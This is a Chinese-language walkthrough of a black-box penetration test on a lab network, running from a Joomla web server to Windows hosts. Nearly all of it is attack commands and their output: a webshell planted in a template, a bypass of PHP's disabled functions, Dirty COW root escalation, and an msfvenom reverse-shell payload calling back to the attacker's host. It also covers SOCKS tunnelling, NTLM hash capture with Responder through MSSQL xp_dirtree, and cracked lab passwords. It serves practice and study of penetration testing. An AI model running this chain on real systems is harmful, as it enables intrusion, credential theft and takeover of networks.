# 环境搭建

拓扑图

image-20220904215127009

# 添加网卡

添加一张网卡,剩下全部不动

image-20220904210137956

# 注意事项

  • 所有的靶机都不要重启,有的服务没有自启动

  • web-centos 需要重启网卡

image-20220904210601122

本期为黑盒测试,不提供任何账号密码

nm,刚进来就给我整活,那个 vm tools 不要点,点了就寄

image-20220904214311217

还有煞笔 windows 自动锁屏了,设置一下

# 外网打点

web-centos

172.29.31.135

# 主机扫描

nmap 扫描

 nmap -sS -sV -Pn -T4 172.29.31.135 

image-20220905100047012

可以看到一

  • 22 端口是 ssh 服务
  • 80 有一个 ndinx 代理服务
  • 3306 有一个 mysql 服务

那么我们访问一下 172.29.31.125 看看代理了什么服务

image-20220905100406975

发现 jummla 服务

# 目录扫描

用 dirsearch 扫描一下,发现很多东西

┌──(miku㉿DESKTOP-G5UPSLJ)-[/mnt/e/soft/dirsearch-master]
└─$ ./dirsearch.py -u http://172.29.31.135/
  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /mnt/e/soft/dirsearch-master/reports/172.29.31.135/-_22-09-05_10-07-24.txt
Error Log: /mnt/e/soft/dirsearch-master/logs/errors-22-09-05_10-07-24.log
Target: http://172.29.31.135/
[10:07:24] Starting: 
[10:07:25] 403 -  278B  - /.configuration.php.swp
[10:07:26] 403 -  278B  - /.ht_wsr.txt
[10:07:26] 403 -  278B  - /.htaccess.bak1
[10:07:26] 403 -  278B  - /.htaccess.orig
[10:07:26] 403 -  278B  - /.htaccess.sample
[10:07:26] 403 -  278B  - /.htaccess.save
[10:07:26] 403 -  278B  - /.htaccess_extra
[10:07:26] 403 -  278B  - /.htaccess_orig
[10:07:26] 403 -  278B  - /.htaccess_sc
[10:07:26] 403 -  278B  - /.htaccessOLD
[10:07:26] 403 -  278B  - /.htaccessOLD2
[10:07:26] 403 -  278B  - /.htaccessBAK
[10:07:26] 403 -  278B  - /.htm
[10:07:26] 403 -  278B  - /.html
[10:07:26] 403 -  278B  - /.htpasswd_test
[10:07:26] 403 -  278B  - /.htpasswds
[10:07:26] 403 -  278B  - /.httr-oauth
[10:07:26] 403 -  278B  - /.php
[10:07:27] 200 -    0B  - /2.php
[10:07:28] 200 -   92KB - /1.php
[10:07:29] 200 -   18KB - /LICENSE.txt
[10:07:29] 200 -    5KB - /README.txt
[10:07:33] 301 -  322B  - /administrator  ->  http://172.29.31.135/administrator/
[10:07:33] 403 -  278B  - /administrator/.htaccess
[10:07:33] 301 -  327B  - /administrator/logs  ->  http://172.29.31.135/administrator/logs/
[10:07:33] 200 -   31B  - /administrator/cache/
[10:07:33] 200 -   31B  - /administrator/logs/
[10:07:33] 200 -    2KB - /administrator/includes/
[10:07:35] 200 -    5KB - /administrator/
[10:07:35] 200 -    5KB - /administrator/index.php
[10:07:35] 301 -  312B  - /bin  ->  http://172.29.31.135/bin/
[10:07:35] 200 -   31B  - /bin/
[10:07:35] 200 -   31B  - /cache/
[10:07:35] 301 -  314B  - /cache  ->  http://172.29.31.135/cache/
[10:07:36] 200 -   31B  - /cli/
[10:07:36] 200 -   31B  - /components/
[10:07:36] 301 -  319B  - /components  ->  http://172.29.31.135/components/ 
[10:07:36] 200 -    0B  - /configuration.php
[10:07:36] 200 -    2KB - /configuration.php~
[10:07:39] 200 -    3KB - /htaccess.txt
[10:07:40] 301 -  315B  - /images  ->  http://172.29.31.135/images/
[10:07:40] 200 -   31B  - /images/
[10:07:40] 301 -  317B  - /includes  ->  http://172.29.31.135/includes/     
[10:07:40] 200 -   31B  - /includes/
[10:07:41] 200 -   16KB - /index.php
[10:07:41] 301 -  317B  - /language  ->  http://172.29.31.135/language/     
[10:07:41] 200 -   31B  - /layouts/
[10:07:41] 301 -  318B  - /libraries  ->  http://172.29.31.135/libraries/   
[10:07:41] 200 -   31B  - /libraries/
[10:07:41] 200 -    9KB - /index.php/login/
[10:07:42] 200 -   31B  - /media/
[10:07:42] 301 -  314B  - /media  ->  http://172.29.31.135/media/
[10:07:43] 301 -  316B  - /modules  ->  http://172.29.31.135/modules/       
[10:07:43] 200 -   31B  - /modules/
[10:07:45] 301 -  316B  - /plugins  ->  http://172.29.31.135/plugins/       
[10:07:45] 200 -   31B  - /plugins/
[10:07:46] 200 -  829B  - /robots.txt
[10:07:47] 403 -  278B  - /server-status
[10:07:47] 403 -  278B  - /server-status/
[10:07:49] 301 -  318B  - /templates  ->  http://172.29.31.135/templates/   
[10:07:49] 200 -   31B  - /templates/index.html
[10:07:49] 200 -   31B  - /templates/
[10:07:49] 200 -    0B  - /templates/system/
[10:07:49] 200 -    0B  - /templates/beez3/
[10:07:49] 200 -    0B  - /templates/protostar/
[10:07:49] 301 -  312B  - /tmp  ->  http://172.29.31.135/tmp/
[10:07:49] 200 -   31B  - /tmp/
[10:07:50] 200 -    2KB - /web.config.txt
Task Completed

image-20220905100840510

# robots.txt

image-20220905100948391

# /administrator

image-20220905101037721

后台登陆页面,但是尝试弱口令爆破无效,再看看别的

# 1.php

这里发现 1.php 是 phpinfo 页面

image-20220905101120650

这里可以看到当前的绝对路径,方便写 shell

image-20220905101217793

还有 disable_function 与 open_basedir 等

image-20220905101346844

image-20220905101443572

# /configuration.php~

image-20220905102059853

查看源代码

<?php
class JConfig {
	public $offline = '0';
	public $offline_message = '网站正在维护。<br /> 请稍候访问。';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'test';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $debug_lang_const = '1';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'testuser';
	public $password = 'cvcvgjASD!@';
	public $db = 'joomla';
	public $dbprefix = 'am2zu_';
	public $live_site = '';
	public $secret = 'gXN9Wbpk7ef3A4Ys';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $ftp_host = '';
	public $ftp_port = '';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = 'test@test.com';
	public $fromname = 'test';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = '';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/administrator/logs';
	public $tmp_path = '/var/www/html/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $shared_session = '0';
}

image-20220905102156765

可以看到里面有数据库的备份内容

public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'testuser';
	public $password = 'cvcvgjASD!@';
	public $db = 'joomla';
	public $dbprefix = 'am2zu_';

尝试远程登陆

# mysql 远程登陆

远程连接上

image-20220905102518809

然后去里面查一下内容

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
+--------------------+
2 rows in set (0.003 sec)
MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| am2zu_action_log_config       |
| am2zu_action_logs             |
| am2zu_action_logs_extensions  |
| am2zu_action_logs_users       |
| am2zu_assets                  |
| am2zu_associations            |
| am2zu_banner_clients          |
| am2zu_banner_tracks           |
| am2zu_banners                 |
| am2zu_categories              |
| am2zu_contact_details         |
| am2zu_content                 |
| am2zu_content_frontpage       |
| am2zu_content_rating          |
| am2zu_content_types           |
| am2zu_contentitem_tag_map     |
| am2zu_core_log_searches       |
| am2zu_extensions              |
| am2zu_fields                  |
| am2zu_fields_categories       |
| am2zu_fields_groups           |
| am2zu_fields_values           |
| am2zu_finder_filters          |
| am2zu_finder_links            |
| am2zu_finder_links_terms0     |
| am2zu_finder_links_terms1     |
| am2zu_finder_links_terms2     |
| am2zu_finder_links_terms3     |
| am2zu_finder_links_terms4     |
| am2zu_finder_links_terms5     |
| am2zu_finder_links_terms6     |
| am2zu_finder_links_terms7     |
| am2zu_finder_links_terms8     |
| am2zu_finder_links_terms9     |
| am2zu_finder_links_termsa     |
| am2zu_finder_links_termsb     |
| am2zu_finder_links_termsc     |
| am2zu_finder_links_termsd     |
| am2zu_finder_links_termse     |
| am2zu_finder_links_termsf     |
| am2zu_finder_taxonomy         |
| am2zu_finder_taxonomy_map     |
| am2zu_finder_terms            |
| am2zu_finder_terms_common     |
| am2zu_finder_tokens           |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types            |
| am2zu_languages               |
| am2zu_menu                    |
| am2zu_menu_types              |
| am2zu_messages                |
| am2zu_messages_cfg            |
| am2zu_modules                 |
| am2zu_modules_menu            |
| am2zu_newsfeeds               |
| am2zu_overrider               |
| am2zu_postinstall_messages    |
| am2zu_privacy_consents        |
| am2zu_privacy_requests        |
| am2zu_redirect_links          |
| am2zu_schemas                 |
| am2zu_session                 |
| am2zu_tags                    |
| am2zu_template_styles         |
| am2zu_ucm_base                |
| am2zu_ucm_content             |
| am2zu_ucm_history             |
| am2zu_update_sites            |
| am2zu_update_sites_extensions |
| am2zu_updates                 |
| am2zu_user_keys               |
| am2zu_user_notes              |
| am2zu_user_profiles           |
| am2zu_user_usergroup_map      |
| am2zu_usergroups              |
| am2zu_users                   |
| am2zu_utf8_conversion         |
| am2zu_viewlevels              |
| umnbt_action_log_config       |
| umnbt_action_logs             |
| umnbt_action_logs_extensions  |
| umnbt_action_logs_users       |
| umnbt_assets                  |
| umnbt_associations            |
| umnbt_banner_clients          |
| umnbt_banner_tracks           |
| umnbt_banners                 |
| umnbt_categories              |
| umnbt_contact_details         |
| umnbt_content                 |
| umnbt_content_frontpage       |
| umnbt_content_rating          |
| umnbt_content_types           |
| umnbt_contentitem_tag_map     |
| umnbt_core_log_searches       |
| umnbt_extensions              |
| umnbt_fields                  |
| umnbt_fields_categories       |
| umnbt_fields_groups           |
| umnbt_fields_values           |
| umnbt_finder_filters          |
| umnbt_finder_links            |
| umnbt_finder_links_terms0     |
| umnbt_finder_links_terms1     |
| umnbt_finder_links_terms2     |
| umnbt_finder_links_terms3     |
| umnbt_finder_links_terms4     |
| umnbt_finder_links_terms5     |
| umnbt_finder_links_terms6     |
| umnbt_finder_links_terms7     |
| umnbt_finder_links_terms8     |
| umnbt_finder_links_terms9     |
| umnbt_finder_links_termsa     |
| umnbt_finder_links_termsb     |
| umnbt_finder_links_termsc     |
| umnbt_finder_links_termsd     |
| umnbt_finder_links_termse     |
| umnbt_finder_links_termsf     |
| umnbt_finder_taxonomy         |
| umnbt_finder_taxonomy_map     |
| umnbt_finder_terms            |
| umnbt_finder_terms_common     |
| umnbt_finder_tokens           |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types            |
| umnbt_languages               |
| umnbt_menu                    |
| umnbt_menu_types              |
| umnbt_messages                |
| umnbt_messages_cfg            |
| umnbt_modules                 |
| umnbt_modules_menu            |
| umnbt_newsfeeds               |
| umnbt_overrider               |
| umnbt_postinstall_messages    |
| umnbt_privacy_consents        |
| umnbt_privacy_requests        |
| umnbt_redirect_links          |
| umnbt_schemas                 |
| umnbt_session                 |
| umnbt_tags                    |
| umnbt_template_styles         |
| umnbt_ucm_base                |
| umnbt_ucm_content             |
| umnbt_ucm_history             |
| umnbt_update_sites            |
| umnbt_update_sites_extensions |
| umnbt_updates                 |
| umnbt_user_keys               |
| umnbt_user_notes              |
| umnbt_user_profiles           |
| umnbt_user_usergroup_map      |
| umnbt_usergroups              |
| umnbt_users                   |
| umnbt_utf8_conversion         |
| umnbt_viewlevels              |
+-------------------------------+
156 rows in set (0.003 sec)

从先前的内容看到,jumla 连接的数据库前缀是 am2zu_

image-20220905102746391

去查一下 user 内容

image-20220905102933146

存在一个 Super User 内容,但是密码是加密之后的内容,尝试使用 update 修改

image-20220905103256901

# 登陆后台

用刚刚修改的密码再去登陆一下后台

image-20220905103429637

成功登入后台

然后去修改内容

image-20220905104042860

然后点击右边的 Beez3

image-20220905104110311

添加一句话木马

image-20220905104735938

然后路径的话我们之前扫描了一个 /templates/beez3/

image-20220905104332721

访问一下

image-20220905104713388

# 蚁剑连接

image-20220905104953963

这里上线了但是由于有 disable_function 而没有响应

这里利用工具绕过

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

上传文件

image-20220905110546096

输入对应路径

http://172.29.31.135/b.php?cmd=id&outpath=/tmp/123&&sopath=/tmp/bypass_disablefunc_x64.so

image-20220905110753720

这样第一台主机就搞定了

# 信息收集

# ifconfig

image-20220905111126239

发现这里的 ip 和我们外面扫描的 ip 不一样,可能是这些服务都是通过一台出网的主机转发的,前面查看了 nginx 服务也印证了这点

# 查看转发流量

使用 netstat -naplt

netstat 的常见参数

  • -a (all) 显示所有选项,默认不显示 LISTEN 相关

  • -t (tcp) 仅显示 tcp 相关选项

  • -u (udp) 仅显示 udp 相关选项

  • -n 拒绝显示别名,能显示数字的全部转化成数字。

  • -l 仅列出有在 Listen (监听) 的服務状态

  • -p 显示建立相关链接的程序名

  • -r 显示路由信息,路由表

  • -e 显示扩展信息,例如 uid 等

  • -s 按各个协议进行统计

  • -c 每隔一个固定时间,执行该 netstat 命令。

image-20220905111909194

可以看到是 192.168.93.100 转发了我们的流量

# fscan 扫描

添加 x

image-20220905130649560

扫描

fscan -h 192.168.93.0/24

扫描完在 /var/www/html/result.txt 可以看到结果

192.168.93.100:22 open
192.168.93.10:135 open
192.168.93.120:80 open
192.168.93.20:80 open
192.168.93.120:22 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.10:139 open
192.168.93.100:80 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.20:1433 open
192.168.93.30:445 open
192.168.93.20:445 open
192.168.93.10:445 open
192.168.93.120:3306 open
192.168.93.100:3306 open
[+] NetInfo:
[*]192.168.93.20
   [->]win2008
   [->]192.168.93.20
[*] WebTitle:http://192.168.93.20      code:404 len:315    title:Not Found
[+] NetInfo:
[*]192.168.93.10
   [->]WIN-8GA56TNV3MV
   [->]192.168.93.10
[*] 192.168.93.30        __MSBROWSE__\WIN7              Windows 7 Professional 7601 Service Pack 1
[+] NetInfo:
[*]192.168.93.30
   [->]win7
   [->]192.168.93.30
[*] 192.168.93.30  (Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.93.10        WORKGROUP\WIN-8GA56TNV3MV   Windows Server 2012 R2 Datacenter 9600
[*] 192.168.93.20        TEST\WIN2008           Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[*] 192.168.93.20  (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] WebTitle:http://192.168.93.120     code:200 len:16020  title:Home
[*] WebTitle:http://192.168.93.100     code:200 len:16020  title:Home
[+] mysql:192.168.93.120:3306:root 123
[+] mysql:192.168.93.100:3306:root 123

获得以下信息

[*] 192.168.93.30        __MSBROWSE__\WIN7              Windows 7 Professional 7601 Service Pack 1

[*] 192.168.93.20        TEST\WIN2008           Windows Server (R) 2008 Datacenter 6003 Service Pack 2

[*] 192.168.93.10        WORKGROUP\WIN-8GA56TNV3MV   Windows Server 2012 R2 Datacenter 9600


# 横向移动

# web-centos

# ssh

在 tmp 目录下面看到了 mysql 目录

image-20220905133623380

image-20220905133735290

adduser wwwuser
passwd wwwuser_123Aqx

这两条命令是 linux 新建用户的命令,又因为之前看到这台主机开启了 ssh 服务

我们尝试连接一下

image-20220905134139791

成功连接

image-20220905134240913

这就是出网的主机

# 信息收集 1

# 查看系统信息

[wwwuser@localhost ~]$ cat /etc/*-re*
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)
CentOS release 6.5 (Final)
cpe:/o:centos:linux:6:GA

image-20220905134419863

# 查看内核版本

[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

版本较低,尝试脏牛漏洞提权

# 脏牛提权

https://github.com/firefart/dirtycow

发现目标主机上有 wget 和 gcc,发送过去本地编译

image-20220905140859189

image-20220905141031147

编译

gcc -pthread dirty.c -o dirty -lcrypt

输入新密码 123456

image-20220905141320436

然后根据 /etc/passwd 查看 root 用户

image-20220905141451034

成功成为 root 用户

# msf 上线

为了后面方便管理,这里同时使用 msf 上线

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.47.130 LPORT=4444 -f elf > mshell.elf

image-20220905203436085

use exploit/multi/handler  #使用监听模块

set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload

set lhost 192.168.47.130 #kaili 的ip

set lport 4444 #木马的端口

成功上线

image-20220905203628412

# 信息收集 2

# 查看进程

image-20220905203746415

没有域管理员的进程

# 查看 /root 目录

image-20220905144631764

存在 nginx 服务,这个 nginx 转发 jummla 服务

再查看一下.bash_history

[firefart@localhost ~]# cat .bash_history 
netstat -pantu
service iptables status 
chkconfig --list 
 chkconfig iptables off
chkconfig --list 
curl http://192.168.1.124/
service iptables stop
curl http://192.168.1.124/
ls
yum  -h
yum -y remove nginx
ls
yum -y install proc* openssl* pcre*
wget http://nginx.org/download/nginx-1.9.4.tar.gz
tar zxvf nginx-1.9.4.tar.gz
 cd nginx-1.9.4
 ./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
$ make
$ make install
yum install -y gcc gcc-c++
$ make
sudo apt-get install build-essential
yum install -y gcc gcc-c++
yum install -y gcc 
gcc
yum install gcc
gcc
$ make
 ./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
make
make install
ls
ps -ef
netstat -pantu
ls
cd man/
la
ls
cd //
cd ~
ls
cd nginx-1.9.4
ls
cd html/
ls
cd ..
ls
cd auto/
ls
cd ..
whereis nginx
cd /usr/sbin/nginx
/usr/sbin/nginx 
netstat -pantu
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
ls
cd /etc/nginx/
ls
cat ngnix.conf
;S
;s
ls
cat nginx.conf
ls
rm nginx.conf
mv ngnix.conf  nginx.conf
cd /usr/sbin/
nginx -c reload
nginx -s reload 
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
nginx -s reload 
ls
cd ~
ls
cd nginx-1.9.4
./configure  --prefix=/etc/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --http-log-path=/var/log/nginx/access.log --pid-path=/var/run/nginx.pid --lock-path=/var/run/nginx.lock --http-client-body-temp-path=/var/cache/nginx/client_temp --http-proxy-temp-path=/var/cache/nginx/proxy_temp --http-fastcgi-temp-path=/var/cache/nginx/fastcgi_temp --http-uwsgi-temp-path=/var/cache/nginx/uwsgi_temp --http-scgi-temp-path=/var/cache/nginx/scgi_temp --user=nginx --group=nginx --with-http_ssl_module --with-http_realip_module --with-http_addition_module --with-http_sub_module --with-http_dav_module --with-http_flv_module --with-http_mp4_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_random_index_module --with-http_secure_link_module --with-http_stub_status_module --with-http_auth_request_module --with-threads --with-stream --with-stream_ssl_module --with-mail --with-mail_ssl_module --with-file-aio --with-ipv6 --with-http_spdy_module --with-cc-opt='-O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic'
$ make
$ make install
cd /usr/sbin/
nginx -s reload 
ls
vi /etc/nginx/nginx.conf
nginx -s reload 
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
cd /usr/bin/
cd /usr/sbin/
nginx -s reload
vi /etc/nginx/nginx.conf
nginx -s reload
netstat -pantu
ls
cd root/
ls
ls -all
cat .bash_history
cd /home/
ls
cd wwwuser/
ls
ls -all
cd ~
ls
ls -all
vim .bash_history 
vi .bash_history 
ls
cd ..
ls
uname -a
adduser  wwwuser
passwd   wwwuser_123Aqx
passwd   wwwuser
su wwwuser
su wwwuser
ip
id
cp /tmp/passwd.bak  /etc/passwd
cat /etc/passwd
su root
yum install git
git clone https://github.com/FireFart/dirtycow.git
ls
ls -all
cd ..
git clone https://github.com/FireFart/dirtycow.git
su wwwuser
ip addr
ifconfig -a
ls
rm Responder-master
rm  -r -f  Responder-master
rm Responder-master.zip 
ls
cd  /etc/sysconfig/network-scripts/
ls
ip addr
cat ifcfg-eth1
cat ifcfg-eth0
cd ~
ls
vim /etc/nginx/nginx.conf
vi /etc/nginx/nginx.conf
/usr/nginx/sbin/nginx -s reload
/usr/sbin/nginx  -s reload
ip addr
cat /etc/passwd
passwd wwwuser
passwd root
ls
cd /home/
ls
ls -all
ls
git clone https://github.com/lgandx/Responder.git
ls
unzip Responder-master.zip 
yum install unzip
unzip Responder-master.zip 
ls
./Responder-master/
ls
cd Responder-master
ls
vim Responder.conf 
vi Responder.conf 
python Responder.py 
ifconfig
python    Responder.py   -I eth1 -r -d -v
python3    Responder.py   -I eth1 -r -d -v
python3    Responder.py   -I eth1
python    Responder.py   -I eth1
yum install python3

关注一下这里

image-20220905144819334

搜索一下

https://blog.csdn.net/wxh0000mm/article/details/105735032?ops_request_misc=%7B%22request%5Fid%22%3A%22166236407216782388043893%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=166236407216782388043893&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-105735032-null-null.142v46pc_rank_34_default_23&utm_term=Responder%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187

https://blog.csdn.net/wxh0000mm/article/details/105734843?ops_request_misc=%7B%22request%5Fid%22%3A%22166236407216782244826085%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=166236407216782244826085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~pc_rank_34-4-105734843-null-null.142v46pc_rank_34_default_23&utm_term=Responder%E5%88%A9%E7%94%A8&spm=1018.2226.3001.4187

这个操作需要监听内网后另一台 windows 主机进行访问,可以抓取另一台主机的 hash,正好之前查看到 192.168.93.20 有 1433 端口,可以尝试利用一下

# win2008

# frp 代理

frps.ini

[common]

bind_port = 7000 

frpc.ini

[common]

server_addr = 192.168.47.130

server_port = 7000

[socks_proxy]

type = tcp

remote_port = 8989

plugin = socks5 

同样用 wget 从 kali 下载下来

image-20220905160530079

然后放后台启动

./frpc -c frpc.ini &

image-20220905160828878

# nmap 扫描

查看一下 192.168.93.20 的 1433 服务

┌──(root㉿kali)-[~]
└─# proxychains nmap -Pn -p 1433 192.168.93.20
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 04:10 EDT
Nmap scan report for 192.168.93.20
Host is up (0.00091s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
Nmap done: 1 IP address (1 host up) scanned in 3.44 seconds

image-20220905161104199

可以看到 open 了,再看一下详细的扫描

Nmap scan report for 192.168.93.20
Host is up (0.00076s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server (R) 2008 Datacenter 6003 Service Pack 2 microsoft-ds (workgroup: TEST)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: WIN2008; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2
Host script results:
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode: 
|   2.0.2: 
|_    Message signing enabled but not required
| ms-sql-info: 
|   Windows server name: WIN2008
|   192.168.93.20\MSSQLSERVER: 
|     Instance name: MSSQLSERVER
|     Version: 
|       name: Microsoft SQL Server 2008 RTM
|       number: 10.00.1600.00
|       Product: Microsoft SQL Server 2008
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| smb2-time: 
|   date: 2022-09-05T08:13:42
|_  start_date: 2019-12-14T11:49:34
|_nbstat: NetBIOS name: WIN2008, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ab:44:ec (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Datacenter 6003 Service Pack 2 (Windows Server (R) 2008 Datacenter 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp2
|   Computer name: win2008
|   NetBIOS computer name: WIN2008\x00
|   Domain name: test.org
|   Forest name: test.org
|   FQDN: win2008.test.org
|_  System time: 2022-09-05T16:13:42+08:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.86 seconds

没啥用,回忆起之前在 jummla 看到的配置文件有账号密码,尝试远程连接 sql server

# sql server 远程连接

下载 dbeaver

新建连接

image-20220905162913646

image-20220905162934988

连接之前需要下载一个组件

image-20220905163044673

然后连接,账号密码查看前面的

public $user = 'testuser';
	public $password = 'cvcvgjASD!@';

image-20220905163241259

连接成功

image-20220905163317644

# sql server getshell

https://www.cnblogs.com/sakura521/p/14967745.html

先尝试使用 xp_cmdshell 组件

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE;

image-20220905164534678

但是没有权限,那么尝试用 xp_dirtree

EXEC master.sys.xp_dirtree 'C:\',0,1; 

image-20220905164755208

可以看到执行了但是没有回显,应该是权限不够,那么利用这台主机去访问 web-centos 启动的 Responder 服务抓取 2008 的 hash,再爆破密码

# Responder

在 web-centos 里面下载 Responder

wget -r 192.168.47.130

image-20220905170458543

抓取内网

python Responder.py -I eth1

image-20220905170818443

然后使用 sql server 触发

EXEC master.sys.xp_dirtree '\\192.168.93.100\IP1$',0,1; 

image-20220905171000616

[SMB] NTLMv2-SSP Client   : 192.168.93.20
[SMB] NTLMv2-SSP Username : WIN2008\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::WIN2008:1122334455667788:28BA43AD9B1D2D2BBA9E28983003CD67:0101000000000000715D1E3A07C1D80167899FBF6BFBE4590000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000011C4314A8F10C5B6E59317CE9DBBCF8859B4494BEA8E251FCE09E150BA4F27F40000000000000000   

放到本地爆破,利用 join 与 hashcat 跑出来

123qwe!AWD

# wmiexec 上线

https://www.freebuf.com/sectool/175208.html

